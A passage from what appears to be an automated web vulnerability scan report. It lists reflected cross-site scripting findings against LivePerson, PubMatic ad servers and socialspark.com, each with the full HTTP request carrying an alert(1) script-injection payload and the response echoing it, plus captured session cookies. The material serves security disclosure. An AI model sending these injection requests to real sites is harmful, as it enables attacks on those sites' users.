GET /hc/53643872/?&visitor=44502044936234&msessionkey=477206776753756820267ae7<img%20src%3da%20onerror%3dalert(1)>84eb79ba639&siteContainer=STANDALONE&site=53643872&cmd=mTagKnockPage&lpCallId=593345544999-141254498158&protV=20&lpjson=1&id=501111955&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-T-Mobile-sales-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.t-mobile.com/shop/phones/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4772067767537568202; HumanClickSiteContainerID_53643872=STANDALONE; LivePersonID=LP i=44502044936234,d=1297806164

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:51:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=477206776753756820267ae7<img src=a onerror=alert(1)>84eb79ba639; path=/hc/53643872
Set-Cookie: HumanClickKEY=477206776753756820267ae7<img src=a onerror=alert(1)>84eb79ba639; path=/hc/53643872
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 20 Mar 2011 13:51:16 GMT
Set-Cookie: HumanClickSiteContainerID_53643872=STANDALONE; path=/hc/53643872
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29246

lpConnLib.Process({"ResultSet": {"lpCallId":"593345544999-141254498158","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='53643872-VID'; lpMTagConfig.FPC_VID='44502044936234'; lpMTagConfig.FPC_SKEY_NAME='53643872-SKEY'; lpMTagConfig.FPC_SKEY='477206776753756820267ae7<img src=a onerror=alert(1)>84eb79ba639';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_53643872'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

1.132. http://showads.pubmatic.com/AdServer/AdServerServlet [frameName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ac55'-alert(1)-'7113b2c4805 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 12:36:06 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=23CB960D-1850-43F1-8508-670563630B6F; domain=pubmatic.com; expires=Mon, 19-Mar-2012 12:36:06 GMT; path=/
Set-Cookie: pubfreq_26437=; domain=pubmatic.com; expires=Tue, 22-Mar-2011 12:36:06 GMT; path=/
Set-Cookie: pubtime_26437=TMC; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:36:06 GMT; path=/
Set-Cookie: _curtime=1300624566; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:46:06 GMT; path=/
Set-Cookie: pubfreq_26437_21304_1562675334=243-1; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:16:06 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:36:06 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1832

document.write('<div id="http_www_woot_comkomli_ads_frame126436264373ac55'-alert(1)-'7113b2c4805" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=RGcAAEVnAAA4UwAAwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAAyM0NCOTYwRC0xODUwLTQ
...[SNIP]...

1.133. http://showads.pubmatic.com/AdServer/AdServerServlet [pageURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c10a2'-alert(1)-'7417dd8beb6 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 12:35:50 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=04AB72F3-B74D-47F8-A0CD-8C8F45ED2FC2; domain=pubmatic.com; expires=Mon, 19-Mar-2012 12:35:50 GMT; path=/
Set-Cookie: pubfreq_26437=; domain=pubmatic.com; expires=Tue, 22-Mar-2011 12:35:50 GMT; path=/
Set-Cookie: pubtime_26437=TMC; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:35:50 GMT; path=/
Set-Cookie: _curtime=1300624550; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:45:50 GMT; path=/
Set-Cookie: pubfreq_26437_21304_716594160=243-1; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:15:50 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:35:50 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1884

document.write('<div id="http_www_woot_comkomli_ads_frame12643626437" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=RGcAAEVnAAA4UwAA3AEAAAAAAA
...[SNIP]...
kadwidth=300&kadheight=250&kltstamp=1300624550&indirectAdId=0&adServerOptimizerId=2&ranreq=0.7504880619235337&campaignId=476&creativeId=0&pctr=0.000000&pixelId=78&imprCap=1&pageURL=http://www.woot.com/c10a2'-alert(1)-'7417dd8beb6">
...[SNIP]...

1.134. http://showads.pubmatic.com/AdServer/AdServerServlet [ranreq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83421'-alert(1)-'fc225601456 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 12:36:09 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=552B8BBF-F384-4838-A4E8-CD0072F9F802; domain=pubmatic.com; expires=Mon, 19-Mar-2012 12:36:09 GMT; path=/
Set-Cookie: pubfreq_26437=; domain=pubmatic.com; expires=Tue, 22-Mar-2011 12:36:09 GMT; path=/
Set-Cookie: pubtime_26437=TMC; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:36:09 GMT; path=/
Set-Cookie: _curtime=1300624569; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:46:09 GMT; path=/
Set-Cookie: pubfreq_26437_21304_1533358288=243-1; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:16:09 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:36:09 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1828

document.write('<div id="http_www_woot_comkomli_ads_frame12643626437" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=RGcAAEVnAAA4UwAAwAQAAAAAAA
...[SNIP]...
siteId=26437&adId=21304&adServerId=243&kefact=2.860000&kpbmtpfact=3.757000&kadNetFrequecy=1&kadwidth=300&kadheight=250&kltstamp=1300624569&indirectAdId=0&adServerOptimizerId=2&ranreq=0.750488061923533783421'-alert(1)-'fc225601456&campaignId=1216&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://www.woot.com/">
...[SNIP]...

1.135. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4292'-alert(1)-'634450195ab was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26436&siteId=26437&adId=21304&kadwidth=300&kadheight=250&kbgColor=ffffff&ktextColor=000000&klinkColor=FFFFFF&pageURL=http://www.woot.com/&frameName=http_www_woot_comkomli_ads_frame12643626437c4292'-alert(1)-'634450195ab&kltstamp=2011-2-20%208%3A28%3A56&ranreq=0.209514970658347&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=458x458&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.woot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; pubtime_26437=TMC; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; PMAT=3q_xFPysNRRq5P6VdKt7tDWS4UmVb8m-YrrvHMmRPMfrin7Yk44Nd-Q; _curtime=1300624482; PMDTSHR=cat:; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.79_1300710881

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:41:13 GMT
Connection: close
Set-Cookie: _curtime=1300628473; domain=pubmatic.com; expires=Sun, 20-Mar-2011 14:51:13 GMT; path=/
Set-Cookie: pubfreq_26437_21304_2028775753=243-1; domain=pubmatic.com; expires=Sun, 20-Mar-2011 14:21:13 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Mon, 21-Mar-2011 13:41:13 GMT; path=/
Content-Length: 1827

document.write('<div id="http_www_woot_comkomli_ads_frame12643626437c4292'-alert(1)-'634450195ab" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=RGcAAEVnAAA4UwAAwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8wAAACwBAAD6AAAAAAAAAAIAAAA0M0E4QUJGQS03NDk3LTQ
...[SNIP]...

1.136. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 661fb'-alert(1)-'5d8ef521e21 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26436&siteId=26437&adId=21762&kadwidth=300&kadheight=250&prevkadIds=21304_21306&kbgColor=ffffff&ktextColor=000000&klinkColor=FFFFFF&pageURL=http://www.woot.com/661fb'-alert(1)-'5d8ef521e21&frameName=http_www_woot_comkomli_ads_frame32643626437&kltstamp=2011-2-20%207%3A34%3A45&ranreq=0.8810346268583089&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=458x450&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.woot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV+WQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; pubfreq_26437=; pubtime_26437=TMC; pubfreq_26437_21304_990920136=243-1; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.79_1300710881; _curtime=1300624477; pubfreq_26437_21306_1985489030=243-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sun, 20 Mar 2011 12:41:36 GMT
Connection: close
Set-Cookie: _curtime=1300624897; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:51:37 GMT; path=/
Set-Cookie: pubfreq_26437_21762_1182891912=243-1; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:21:37 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:41:37 GMT; path=/
Content-Length: 1832

document.write('<div id="http_www_woot_comkomli_ads_frame32643626437" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=RGcAAEVnAAACVQAAwAQAAAAAAA
...[SNIP]...
requecy=3&kadwidth=300&kadheight=250&kltstamp=1300624897&indirectAdId=0&adServerOptimizerId=2&ranreq=0.8810346268583089&campaignId=1216&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://www.woot.com/661fb'-alert(1)-'5d8ef521e21">
...[SNIP]...

1.137. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7ee8'-alert(1)-'b69c6933f14 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26436&siteId=26437&adId=21762&kadwidth=300&kadheight=250&prevkadIds=21304_21306&kbgColor=ffffff&ktextColor=000000&klinkColor=FFFFFF&pageURL=http://www.woot.com/&frameName=http_www_woot_comkomli_ads_frame32643626437&kltstamp=2011-2-20%207%3A34%3A45&ranreq=0.8810346268583089b7ee8'-alert(1)-'b69c6933f14&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=458x450&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.woot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV+WQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; pubfreq_26437=; pubtime_26437=TMC; pubfreq_26437_21304_990920136=243-1; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.79_1300710881; _curtime=1300624477; pubfreq_26437_21306_1985489030=243-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sun, 20 Mar 2011 12:41:41 GMT
Connection: close
Set-Cookie: _curtime=1300624901; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:51:41 GMT; path=/
Set-Cookie: pubfreq_26437_21762_1541912932=243-1; domain=pubmatic.com; expires=Sun, 20-Mar-2011 13:21:41 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Mon, 21-Mar-2011 12:41:41 GMT; path=/
Content-Length: 2058

document.writeln('<'+'script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5757398&cch=5766863&code=5766875&l=300x250&aid=25369308&ahcid=535345&bimpd=G0WGzRR-eEo3MUsats1n47p-MqnlRje
...[SNIP]...
siteId=26437&adId=21762&adServerId=243&kefact=3.585000&kpbmtpfact=4.780000&kadNetFrequecy=3&kadwidth=300&kadheight=250&kltstamp=1300624901&indirectAdId=0&adServerOptimizerId=2&ranreq=0.8810346268583089b7ee8'-alert(1)-'b69c6933f14&campaignId=488&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://www.woot.com/">
...[SNIP]...

1.138. http://socialspark.com/images/claimdot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images/claimdot.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b68"><script>alert(1)</script>b4a78946341 was submitted in the REST URL parameter 1. This input was echoed as 37b68\"><script>alert(1)</script>b4a78946341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68"><script>alert(1)</script>b4a78946341/claimdot.gif HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://www.politicaldisgust.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:13:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:13:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68\"><script>alert(1)</script>b4a78946341/claimdot.gif"/>
...[SNIP]...

1.139. http://socialspark.com/images/claimdot.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images/claimdot.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69c21"><script>alert(1)</script>5d6935815d3 was submitted in the REST URL parameter 2. This input was echoed as 69c21\"><script>alert(1)</script>5d6935815d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/69c21"><script>alert(1)</script>5d6935815d3 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://www.politicaldisgust.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:13:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:13:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images/69c21\"><script>alert(1)</script>5d6935815d3"/>
...[SNIP]...

1.140. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a06ed"><script>alert(1)</script>38cba5cf84f was submitted in the REST URL parameter 1. This input was echoed as a06ed\"><script>alert(1)</script>38cba5cf84f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(0x0024)%3Ca06ed"><script>alert(1)</script>38cba5cf84f/script%3Eb4a78946341/claimdot.gif HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.3.10.1300628473

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3Ca06ed\"><script>alert(1)</script>38cba5cf84f/script%3Eb4a78946341/claimdot.gif"/>
...[SNIP]...

1.141. http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341/claimdot.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe39c"><script>alert(1)</script>8dc8f0fd0c0 was submitted in the REST URL parameter 2. This input was echoed as fe39c\"><script>alert(1)</script>8dc8f0fd0c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images37b68%22%3E%3Cscript%3Ealert(0x0024)%3C/script%3Eb4a78946341fe39c"><script>alert(1)</script>8dc8f0fd0c0/claimdot.gif HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
